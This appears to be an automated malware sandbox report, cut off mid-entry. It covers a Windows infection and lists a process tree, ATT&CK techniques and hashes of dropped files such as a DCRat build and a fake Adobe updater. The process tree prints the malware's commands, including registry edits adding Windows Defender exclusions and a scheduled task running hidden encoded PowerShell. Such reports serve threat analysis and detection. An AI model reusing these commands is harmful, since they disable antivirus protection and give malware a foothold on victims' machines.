"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
3⤵
PID:7968

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
3⤵
PID:7356

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
3⤵
PID:5972

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
3⤵
PID:4816

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\GsQRrtwSziAnYplPc /t REG_DWORD /d 0 /reg:32
3⤵
PID:784

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\GsQRrtwSziAnYplPc /t REG_DWORD /d 0 /reg:64
3⤵
PID:1556

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\qUDHiGcWmqaEfibr /t REG_DWORD /d 0 /reg:32
3⤵
PID:6600

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\qUDHiGcWmqaEfibr /t REG_DWORD /d 0 /reg:64
3⤵
PID:5276

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "glDUtYFGT" /SC once /ST 09:33:38 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
2⤵
- Creates scheduled task(s)
PID:5904

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "glDUtYFGT"
2⤵
PID:8308

C:\Users\Admin\AppData\Roaming\Windata\system.exe
C:\Users\Admin\AppData\Roaming\Windata\system.exe
1⤵
PID:6628

C:\Program Files (x86)\Internet Explorer\twztl.exe
"C:\Program Files (x86)\Internet Explorer\twztl.exe"
1⤵
PID:6804

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:6796

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "Windows Upgrade Manager"
1⤵
PID:6052

C:\Windows\System32\PickerHost.exe
C:\Windows\System32\PickerHost.exe -Embedding
1⤵
PID:7400

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\950F.bat" "
1⤵
PID:3152

C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
2⤵
PID:3932

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa38fc055 /state1:0x41c64e6d
1⤵
PID:6336

C:\PortproviderwinMonitorSvc\dllhost.exe
C:\PortproviderwinMonitorSvc\dllhost.exe
1⤵
PID:1136

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k BcastDVRUserService -s BcastDVRUserService
1⤵
PID:6460

C:\Users\Admin\AppData\Local\Temp\GsQRrtwSziAnYplPc\CShgmbCUeIuNzVH\XcqYegK.exe
C:\Users\Admin\AppData\Local\Temp\GsQRrtwSziAnYplPc\CShgmbCUeIuNzVH\XcqYegK.exe mP /VIsite_idOHu 385118 /S
1⤵
PID:7924

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 8140 -ip 8140
1⤵
PID:4992

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 5840 -ip 5840
1⤵
PID:8076

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 684 -p 7236 -ip 7236
1⤵
PID:8432

C:\Users\Admin\AppData\Local\Temp\GsQRrtwSziAnYplPc\CShgmbCUeIuNzVH\XcqYegK.exe
C:\Users\Admin\AppData\Local\Temp\GsQRrtwSziAnYplPc\CShgmbCUeIuNzVH\XcqYegK.exe mP /VIsite_idOHu 385118 /S
1⤵
PID:8640

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8B18.bat" "
1⤵
PID:9200

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k BcastDVRUserService -s BcastDVRUserService
1⤵
PID:5096

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k BcastDVRUserService -s BcastDVRUserService
1⤵
PID:1868

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:5468

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Disable or Modify System Firewall

T1562.004

Virtualization/Sandbox Evasion

T1497

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Remote System Discovery

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\PortproviderwinMonitorSvc\ContainerserverFontSavessession.exe
Filesize
1.9MB

MD5
d67f722b73a3cbef568a2e3124a4bc04

SHA1
27e0a75a646fb2869b31eab2f34f1de4db7e35e6

SHA256
b83aed8214e0f95cb74b9b2bbc49b16bd46cc46a9ec620a4ab1a3ddbde34c303

SHA512
c050652f2b11f4ad3ff9832f894ae6ada16400c41576b64e9bcfa2b785f15987b7d846f9bb597c4495edad91b4c67a8d601d5757afee39ed890148461f6de9bb

Download Submit
C:\PortproviderwinMonitorSvc\mfKYow52WThs6WxYPgYy8SvlAX398RVKTuVkRNatbU.vbe
Filesize
251B

MD5
288ece3d2e1006c5fa8a526d2d0fab12

SHA1
b466938792d856b963788f55037be3893024169f

SHA256
47a7ef36b24fc4250a41e93d7e132fee06b972b98317e6226814e676092b1fb1

SHA512
f818e2293f7128d1d12eeb577bbb1f9d16f0208a2b2c68d30f4b12e7ebececdc93c6b272810efb22d9b4778105e0ffc5da095feeda50ccfe9efecd52644a69b7

Download Submit
C:\PortproviderwinMonitorSvc\vcwCtM23VtO7vZcBlCg44jyJmSVgI43HgFP0J6KvnQO3IbLY.bat
Filesize
101B

MD5
a1e10402205eb4379b696c320914eea5

SHA1
048575ccf93cf9d1e039b1b1bce5eb97d61e1048

SHA256
0861e3de74e15568d8ed44ff86fea6f446ba8eb1561ec374202b4ebba7e279b5

SHA512
fde6ddd99da5609f138badeb28f448a2b673374a1c19eee36f9215c11efe96d7d9d64a396dcbfccc911ed26915c14ace092f10b821707162cd634d08663ad427

Download Submit
C:\Program Files\Assistenza Geacon\Assistenza Updater.exe
Filesize
4KB

MD5
bffa86335e62dbf57d5a4db32dc1aaf9

SHA1
64ede41920ae9d8e21e2681f417ca74f07f7bdd9

SHA256
2cb9791c3430f60011862dc48aa4f971c379ad31414f11abfe3f66a30994dede

SHA512
2d84b8f74cc3b1be6a166b9b4dc74e690b7e2c32bbd5c10fbb143c1558270272b30808d8a662f30ed05a12194d538bec10fd9ffff01fd08df8ae4a2830600d95

Download Submit
C:\ProgramData\Are.docx
Filesize
11KB

MD5
a33e5b189842c5867f46566bdbf7a095

SHA1
e1c06359f6a76da90d19e8fd95e79c832edb3196

SHA256
5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454

SHA512
f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

Download Submit
C:\ProgramData\BAKFBKEH
Filesize
92KB

MD5
4a857a29a50967d93837ee853569c1c3

SHA1
3654882c41d802511619523c944c305393a54b4b

SHA256
64ecfff4375d3548a9fc27b028b2f093a208fa93d9877c2c2bc267459efa3df4

SHA512
cc49feb7564eb644f79a7c9ebd4b48d8edd83f7c7dbc272b2e58adf506b9376e2e0e15ebf4df0cf2dceed2e4b9412d92b2e2c2bbb86f598c07f8e5a0b83c8cd0

Download Submit
C:\ProgramData\FCFIEHCFIECBGCBFHIJJ
Filesize
46KB

MD5
02d2c46697e3714e49f46b680b9a6b83

SHA1
84f98b56d49f01e9b6b76a4e21accf64fd319140

SHA256
522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9

SHA512
60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

Download Submit
C:\ProgramData\HDBKFHIJ
Filesize
112KB

MD5
87210e9e528a4ddb09c6b671937c79c6

SHA1
3c75314714619f5b55e25769e0985d497f0062f2

SHA256
eeb23424586eb7bc62b51b19f1719c6571b71b167f4d63f25984b7f5c5436db1

SHA512
f8cb8098dc8d478854cddddeac3396bc7b602c4d0449491ecacea7b9106672f36b55b377c724dc6881bee407c6b6c5c3352495ed4b852dd578aa3643a43e37c0

Download Submit
C:\ProgramData\mozglue.dll
Filesize
593KB

MD5
c8fd9be83bc728cc04beffafc2907fe9

SHA1
95ab9f701e0024cedfbd312bcfe4e726744c4f2e

SHA256
ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

SHA512
fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize
240B

MD5
9ce4cbd8f6fc20c6a36905c054c3b2a0

SHA1
69bcb65504bb8968c255955eb7127986aaf103f8

SHA256
f32acbc4e5a2a32561c498dd1cf5bd28e83f9d27e33581ac2582a939986de5a3

SHA512
2b84a4f22d3e82d119b78507c3153e006e1e6e81c87045d189131de29bd641d38ba1bf555e83efeb01686fcf1db2fed10eb40fd4979238356329e6fac100c781

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
Filesize
2KB

MD5
0988931286c1aa0d953ce23e3ef14e81

SHA1
92f28a99fb752a5a589848b52be223c40c5f988c

SHA256
0e939c793bdd5043d441ba067bdc4bc21617dbdf43b1e7b8776b1c52192b42ab

SHA512
c9d0f7b7cbb97276b4dc69bf2d8740d27b0c8d59d3aacd9208845778db00924011c3c38f38f869aeb6527fcb661779ccb71679fbd3d90b343e1bc1a18df328ca

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
Filesize
371B

MD5
a94c6155457665dd3aecffd74606dfd3

SHA1
46a72b5c3fd6959aad6e4990863fa662b1f29887

SHA256
7595a1b2e342d47853c0f06f1016c913905298728f7bfb6fcca17f19a2d8e5df

SHA512
3d072abcd303f4f818287747bf9bf365afbed43b9bb5f028d857a0b731646e420e8b045a1af788b77f1ed5164ae3b5a3198533fdf909948d6a647029613b63e3

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
Filesize
6KB

MD5
cf446d87bbd564e497acc4887ed1f93e

SHA1
102fab781eac1bf5b3a246716b654aafa9da2942

SHA256
3fb60c1bd2b7c1a62dfd80a534571afc2ab7ec34a0fdd559a86342e800041c8c

SHA512
df25020a40d4f7b0e671fdab9c258428005bef2e88b5f789301e7f7760bab4b16aac9dd821fcab6d50deff648830e8d307f615558c955594baf9b84378b90eaf

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
Filesize
15KB

MD5
c62ad028c69ef4952a39107535dff580

SHA1
3eccdb9153b41098b4cee44b37f0be38c0c5d578

SHA256
d9dc7e6e5f770c5d25801abb1823a0a6cf97416799532a986cfe936f7cf691c2

SHA512
980eb3662ae19c0635c743e70c85403ae0bb8ef23fc3168386ecee519bc0810067934c2ce615c68897ccb4e63fceb22e7881420282c8b4a99350f4dab11d7946

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
Filesize
261KB

MD5
8438460b69a2ea94cffd6a4b64fb6949

SHA1
aaba034fcc2016bf5ff0c5861fe938066c5843c1

SHA256
51056f1fb8bf58178cda363433b62b7a64d4cd593d939a879021a7cb4a58f631

SHA512
fe21eabe6b223c001b89bfcee1cf33fc9a76d349ea7802210e83c3a64593ffdfac5de79e6c663e02d1e000046d91490fb398c092645a1c3574aeecf7d6c94b33

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json
Filesize
2B

MD5
99914b932bd37a50b983c5e7c90ae93b

SHA1
bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

SHA256
44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

SHA512
27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\crypted_d786fd3e.exe.log
Filesize
42B

MD5
84cfdb4b995b1dbf543b26b86c863adc

SHA1
d2f47764908bf30036cf8248b9ff5541e2711fa2

SHA256
d8988d672d6915b46946b28c06ad8066c50041f6152a91d37ffa5cf129cc146b

SHA512
485f0ed45e13f00a93762cbf15b4b8f996553baa021152fae5aba051e3736bcd3ca8f4328f0e6d9e3e1f910c96c4a9ae055331123ee08e3c2ce3a99ac2e177ce

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\B17I8UEZ\2[1]
Filesize
14KB

MD5
fce292c79288067dc17919ed588c161c

SHA1
bb44fa2c95af5bbd11e49264a40c16d6f343fa21

SHA256
4ef8146d85d60c2867bdbe44304b5ba00cceb208f4c10c9f91183308e1da3828

SHA512
73dac29753044a720fc43b4ee19d320e06855167cdf0ebf329207aa16faa13fd6d2937bd87b54e544dd8d4c3da634773abd73769d3915154099ff01e6e03033e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\B17I8UEZ\5[1]
Filesize
8KB

MD5
561816e1c4e7fedcd14342d0b203c48b

SHA1
c833316b6415f277eabaf66f6edc71d41770e094

SHA256
e0ad6f3d6e5cb162a1658ba96c04e4df39adcf593b28f5d07222dbb02d7fbb18

SHA512
25be65e63b5b6d3e6d510c0310e2e5c1cea876bdb72226d9a6dfc0feff4f12d11b7a776042b87c7774f69b174be4e28065988199049d6670198e9e330f067fd5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\SPOUPI7T\1[1]
Filesize
85KB

MD5
34a87206cee71119a2c6a02e0129718e

SHA1
806643ae1b7685d64c2796227229461c8d526cd6

SHA256
ecea49f9a754af7055b60a860acfd8ce2bc63048c947c9ee6324f07d45c4787d

SHA512
e83b0e003687ebe5d5df5bd405b12b267e07252838d1575dc390b409e03279f9d0ce4a4691971a9601f58d52e55af2fa8ea9596ace4bef246f9ef511b65cdbc3

Download Submit
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404091037481\additional_file0.tmp
Filesize
2.5MB

MD5
20d293b9bf23403179ca48086ba88867

SHA1
dedf311108f607a387d486d812514a2defbd1b9e

SHA256
fd996b95ae46014edfd630bfc2bf8bc9e626adf883a1da017a8c3973b68ec348

SHA512
5d575c6f0d914583f9bb54f7b884caf9182f26f850da9bdd962f4ed5ed7258316a46fafaf3828dccb6916baaadb681fe1d175a3f4ed59f56066dc7e32b66f7b6

Download Submit
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404091037481\opera_package
Filesize
103.9MB

MD5
f9172d1f7a8316c593bdddc47f403b06

SHA1
ed1e5a40b040af2c60ed6c2536b3bf7ee55e0e52

SHA256
473f0d4b886db8cd39b900b92bdc0625a3fcec8addd43f71179696bdf186ec3b

SHA512
f51ab2bdf29ca6839e4f7cf1fac1bdfc03ba2da4569a8f21e5d2ee13e6519097c3da40bf0b4ca7642286ed033d0126bbd14ef7842eb9f2db1d6e503849521b02

Download Submit
C:\Users\Admin\AppData\Local\Temp\1981120061.exe
Filesize
84KB

MD5
161a475bfe57d8b5317ca1f2f24b88fa

SHA1
38fa8a789d3d7570c411ddf4c038d89524142c2c

SHA256
98fb81423a107a5359e5fc86f1c4d81ff2d4bc73b79f55a5bf827fdb8e620c54

SHA512
d9f61f80c96fbac030c1105274f690d38d5dc8af360645102080a7caed7bad303ae89ed0e169124b834a68d1a669781eb70269bf4e8d5f34aeef394dd3d16547

Download Submit
C:\Users\Admin\AppData\Local\Temp\216382182.exe
Filesize
85KB

MD5
10ffc145e1c09190a496a0e0527b4f3f

SHA1
e21fba21a11eecb4bc37638f48aed9f09d8912f6

SHA256
80b7e224f28c6160737a313221b9fc94d5f5e933ae1438afef4b5fae33185b2d

SHA512
bec357e73376f2e9e2963db5f7110a4c90de31a94edfaa7bf59c2f01b7bdd0c33e9a8024e995b7f0e67e332bc4aa0ec1280c7c28a24ba554772f8325e1badd1d

Download Submit
C:\Users\Admin\AppData\Local\Temp\2565728307.exe
Filesize
14KB

MD5
2f4ab1a4a57649200550c0906d57bc28

SHA1
94bc52ed3921791630b2a001d9565b8f1bd3bd17

SHA256
baa6149b5b917ea3af1f7c77a65e26a34a191a31a9c79726bd60baf4656701fa

SHA512
ab1a59aa4c48f6c7fcf7950f4a68c3b89a56f266681a5aabd0df947af8340676e209d82ddd1997bfebd972b35ca235233b61231335aec4567f7b031e786ea7e8

Download Submit
C:\Users\Admin\AppData\Local\Temp\274826858.exe
Filesize
8KB

MD5
11861ff368cdb82536b9313e7301ce4f

SHA1
7691adefb0d65fcdd7803ce8896d183cd4edc3cf

SHA256
38a5e274bd63a97d2075a0f24b521dcce4f63e8e5faf3a458da1f227d38f485e

SHA512
379e174a6bb0fabaa5ac2acebb30d6032992cd1c943f41ded4613697b11b88e2b14ee060b49c2d676253bc0ae8095ac0df4ea8948dfd464a812d7721cd61b7f2

Download Submit
C:\Users\Admin\AppData\Local\Temp\6nny8f82C5.bat
Filesize
146B

MD5
34f10965646ee17bf03fce7b69322a36

SHA1
7c9692fe8dd8c736f5de0cf42d1bdc697e995bfa

SHA256
f66a7c30aedc4ce4fc4b36e3e501fbbc1748c7ac8e5462033c7732479ea83cab

SHA512
4688dc5ab119a9d63448de40ff6cf0f923847eff7f1b88e4ade0051d516137d5a25a57ead8690b87cdc800f8c3927b277f25d00ce4cb449bf6928f1aff8a77cf

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS3015.tmp\Install.exe
Filesize
6.7MB

MD5
f92261d3923e908962715be7cc5266f8

SHA1
9e6b2bc2ca098a295b666d965bb1f22af4a61689

SHA256
25dcde71da97815f0e396b7788a6c9fb3dfd96b00d02549c8418785f457e8940

SHA512
53bff9120384349ced137b458b2314ac877902b5c71c983616c1841daf0c9b46d6167362d2b85c90370d87ef7968e6c31937a64033ed4999f69c6a1a9fe49795

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zSAF0F.tmp\amdfendrsr.exe
Filesize
505KB

MD5
5e18b81a9f038cd2e6ac3a9ffbde9b5d

SHA1
7150f9b2b238b5b2c3573c66c4741831e941a1e6

SHA256
523bcc22c0380ffa1aaf4bbf29808b1ad9c9f532e0405b923cc51000eb875fbd

SHA512
f55a8b158d8385c3eaba5fd2159b1e66859b6318a5ec5e221283349a584b5c63a306215d483b300fb1fb019c9fa8ae25d75d9c80b0ad33d25e41d10ce47447a7

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zSAF0F.tmp\bootim.exe
Filesize
48KB

MD5
f7eeb4a2e532e564b6115c43e074d3af

SHA1
314e4aa1cba618481c8ae89d48096cd62ce21851

SHA256
a5f4bc1491034a1f28550eaa9813ac61b230949064fcb8299ab3922c519265bf

SHA512
3de9be0664d6d5170dd754882e3eeedf4da8b99eace21dd0275896633ca25b036bf427211ab63cc2712eca668ea50f515ee35557147db7cac9adb4e5b562b13b

Download Submit
C:\Users\Admin\AppData\Local\Temp\8B18.bat
Filesize
77B

MD5
55cc761bf3429324e5a0095cab002113

SHA1
2cc1ef4542a4e92d4158ab3978425d517fafd16d

SHA256
d6cceb3c71b80403364bf142f2fa4624ee0be36a49bac25ed45a497cf1ce9c3a

SHA512
33f9f5cad22d291077787c7df510806e4ac31f453d288712595af6debe579fabed6cdf4662e46e6fa94de135b161e739f55cfae05c36c87af85ed6a6ad1c9155

Download Submit
C:\Users\Admin\AppData\Local\Temp\FE714B.tmp
Filesize
127B

MD5
2e3b42792bf4affe8383f09585e315d3

SHA1
7ba14552219033382282283075678027aaa5dfc4

SHA256
46edbfaf2902f534d5b00c97536742dcc97051e25c693c290b33f7518bb9efd1

SHA512
4a34240c703f6bf858b875a2f97820e43f6ff0e82a5cd3ee9715e0d51bca170fa1ee517195f6f3bdcc6a24ff6cbd7420d60bf5320e52c6d2b18e6103f619f096

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\23.exe
Filesize
290KB

MD5
91ab5914b61a0250cffa61c6f35776b9

SHA1
83de2e18fe6c76ee644415b04880699b793859d2

SHA256
7295533ab80a750240400bac3c6fe17a89084152199ba8acb5427db3c1c40f98

SHA512
d77e1a90f2658ee185217c2f88959cc7b3ccc47bf339cfb267e8146306b0c357a0c850f47c6e1c0f50382413a8b83b15fb7c94d437664dfbc37f56697499a087

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\Adobe_update.exe
Filesize
334KB

MD5
cd77e00b04bc4ad0ccb96a7819c9dda8

SHA1
f41f6ccb7a4117f8b646940caf501c2d8904e336

SHA256
3a14bf440814f53b7260a37dcc2a422f6a3859cfada26a143496be81e41f0706

SHA512
9f06c96fa6c8cd4b7adc50b7915b4cbb4e171f1180ecf0e56d31890dade54983bf1c014badb6f26ffd708dfd2a566659a2deefa0bc05280b2914c521575281a1

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\AppGate2103v01.exe
Filesize
7.2MB

MD5
e22f713ca51e6ac129ed8dab1bedb8a6

SHA1
61280be1fa0cee8c8148bdd167eb7176bb1df1b8

SHA256
c067cf39d43b39a560eca901609bc4d403f53f565d22370a0e9458b4e91a6824

SHA512
345bee45708ba133449dd8567ff41e9dfda48c6de4efa41d0c7c8e874767d39266ca7d5ee51e39e91eb19361d1f27b1b5a274576ea424cc6b89bcc517ab55636

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\Assistenza%20Launcher.exe
Filesize
1.2MB

MD5
248a4c8d4ff1bdd7fcd16623413b9aed

SHA1
a230024285dc728759fff49e1613de6db54ce69b

SHA256
3594d1e3ac0310eb1695d18bf302b9793f19f08db917d91e4f992c2fca2d65ac

SHA512
c6ea5c5864bf8239f79d5a2e0a122ee59f62300a0b36c7cd17d47581e47306ea1bddbd3eb16a9bd4682f81feedae732c3d1c40673b7526dfd418e26a2197bc40

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\DCRatBuild.exe
Filesize
2.2MB

MD5
84c895e5e9d2e8a4a33bcc6ec7657b20

SHA1
f7efe5f005597309a25ad8eeaba6c77dff827caf

SHA256
eb1807ea8cd84c6a86406728505e9cef81fcf78de2e2d1af4e5d1ed67a726ed5

SHA512
423841c1d334029bcfc4265b9599d219d42e8938504d9e9af0691111cbdb24c1d0a3712176b96faf0596732fa65129ee8e49a0a38efdfcfd3b212be82208ddff

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\Document.exe
Filesize
492KB

MD5
0eec3b50636ae6d37613e6a2c7617191

SHA1
630d5e3b88215d88432db42d2bd295c6d4b55ee8

SHA256
32dc8827ff96982401777cd7feb77798660450a3e8960855577e8ace837f8b05

SHA512
9a2088cce7ed6da8e2f13f2486925e7565b50a6c527363f0da19ff28910314fb9723496dfe3ddf0a977d1b0c8ff1661f0ae6bc3789332534ad0bea3cbafbdc12

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\EchoNavigator.exe
Filesize
9.3MB

MD5
5df01f9e45f5e3c30a3534a4be701aed

SHA1
2260bda07a9f49da7cf8fd79a8c9f3ed1e823cff

SHA256
be569b1dc8758a791c81d7a4d9d653018e02f1206bc6e18d246a9d4dade25d39

SHA512
e20fd9ce0deecb9f0e3c98b590dc0d10f720dcd541c97360cac807efcdea50ee9fec0e40ab3660ca90e0492664d2c12ab9f7ccf56eaedad7f19e253fb3bc1d9b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\Eszop.exe
Filesize
466KB

MD5
9379b6e19fb3154d809f8ad97ff03699

SHA1
b6e4e709a960fbb12c05c97ed522d59da8a2decb

SHA256
e97b0117c7dc1aeb1ef08620ed6833ee61d01ce17c1e01f08aa2a51c5278beca

SHA512
b181ccc6811f788d3a24bb6fa36b516f2c20d1258fecec03a0429f8ab3fd4b74fc336bfec1b9d1f5f01532ae6f665bfaac4784cab5b8b20fd8ee31a11d551b21

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\LoaderAVX.exe
Filesize
1.2MB

MD5
0c43fe7786f9c0e4b726f72c758e3eed

SHA1
1746a8826c2f3cae77ff09eccbe93c14bdbfd2ce

SHA256
13421339f7ad76def0302d75897ae4d0e3d4d06545716285f9d0c48e02aca7be

SHA512
6a95b03f90e8fa6b3d375bde6105cfe0c62a780b9766868e173bd27a6cabb27f8b798295b0682015bd77706ac2eceb037eedcf263fc2110ba9be5b80921e6fd2

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\Max.exe
Filesize
5.1MB

MD5
db5417155182f4e3a9277c2652065256

SHA1
d6ebaa6ee5c323a562c3f1742731f0eb3e333f42

SHA256
0f1fe064d3d23499968b8f3e972e775bf81903a9b3e85422d156e36795c48ad3

SHA512
961b2108bfd1c8afa8c125cc7d94e122a2085b6d49151ea00b0a7def1d8c83edac3ae02ab562732aa1be5fef71cec5eca5d3cce19f7c7a9eaf134de405d69a15

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\Mtkfarukc.exe
Filesize
23KB

MD5
3e2f66f617318069be60fe1c16ecdfd6

SHA1
7712d6f2c085ac2603a3701143e8ac71f7b3aa9e

SHA256
1cfbcd1f141c0199ba408b39fb9a178894c2bec3a05a64f961dc06f7939fabf3

SHA512
f111cddf1d2c4cb630a9dcc3cf6f3dfdea7eeac2e286080299011cdac18ee84c36e035807856461cb64b68262cc51cf0951b55bca5cace7361b6f7d835f3d0da

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\NINJA.exe
Filesize
817KB

MD5
9e870f801dd759298a34be67b104d930

SHA1
c770dab38fce750094a42b1d26311fe135e961ba

SHA256
6f1f83697d8caf1ac3cf0c3b05913633d49e756ed17189efc32cb0a6c3820e6b

SHA512
f0719d751e71229369ba9c49eee649e130f8eed7e7b662c724f8e7b25a950d77d4ba69aa967394d007561383ca64b95bcb0f466dfc7e1d4e00bf9e3829c957bf

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\Nzewxakqtk.exe
Filesize
51KB

MD5
b4bb2848a06f5b7cc4164ac2a701f50a

SHA1
9ad29b0652b419df2840526002f2c9ae483c0f48

SHA256
fb9844ab20cb5995d2fb6df467f1aee283ca0a013b8f330ad39a9ed5e3c7c026

SHA512
9dcec4f9a6a299010abef9557fd7c19e9410ded76dae915136dbb2365787d88fd7c1e712d475d9f6136d1244b9e867c50e767e10d7d4891ea817bf09241d67ba

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\Pac-Man.exe
Filesize
5.7MB

MD5
8951c19af1a1bc8423823007abdf9ade

SHA1
86aec431d6bba08dbc76e236ca490a7ad3f0ded9

SHA256
420b23eea40a6a4bf0f1cdfffe85d1e6ca59da357268c0373c8d30d1b5c99fa3

SHA512
